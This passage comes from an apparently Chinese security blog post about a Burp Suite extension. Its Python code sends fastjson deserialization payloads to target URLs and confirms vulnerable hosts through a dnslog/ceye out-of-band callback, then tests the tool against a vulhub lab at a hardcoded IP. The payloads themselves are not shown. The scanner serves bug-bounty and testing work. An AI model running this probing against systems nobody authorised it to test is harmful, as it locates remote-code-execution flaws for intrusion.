for payload in self.fuzzLFI.fastjson:
try:
fastjson1 = requests.post(url, headers=heaers, timeout=5, data=payload, verify=False)
except Exception as e:
pass
pattern = re.compile('fastjson')
response = self.ceyeFin()
result = pattern.findall(response)
#print response
#print result
if result:
content = '[+]{} -> {} [Headers] -> {} [Bodys] -> {}'.format('[fastjson Body GET]', url, heaers,
payload)
print (content)
self.save(content + ' ')
print ('-' * 50)
使用vulhub搭建一个漏洞环境
写个测试脚本
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import re
proxies = {
"http":"http://127.0.0.1:8080"
}
def test():
headers = {
"Content-Type":"application/json",
"Accept": "*/*",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
url = "http://121.196.181.55:8090/"
try:
res = requests.get(url,headers=headers,timeout=15,proxies=proxies)
print(res.content)
except Exception as e:
print(e)
if __name__ == "__main__":
test()
dnslog平台收到dnslog信息,就能判断是fastjson3那条paylaod触发了
dnslog.io也收到告警
代码地址:
https://github.com/dongfangyuxiao/BurpExtend/blob/master/Scan/scan_fin.py
结语其实插件已经写了好久了,也已经更新了好几个版本了,最初的灵感来源于农夫的十八(公众号悦信安),今年元旦后开始正式用于挖SRC,也挖了好几家还不错的排名,所以想着把自己学习的知识分享给大家。原本计划打算是合成一个py脚本,后来因为时间原因也没能完成,目前在做一个甲方的自动化的渗透测试巡检平台,已经完成了脚本型的开发,图形化展示预估计今年年底可以面世,感兴趣的同学可以私聊我一起参与。
过程笔记可以参考
https://github.com/dongfangyuxiao/BurpExtend/tree/master/Burp插件学习笔记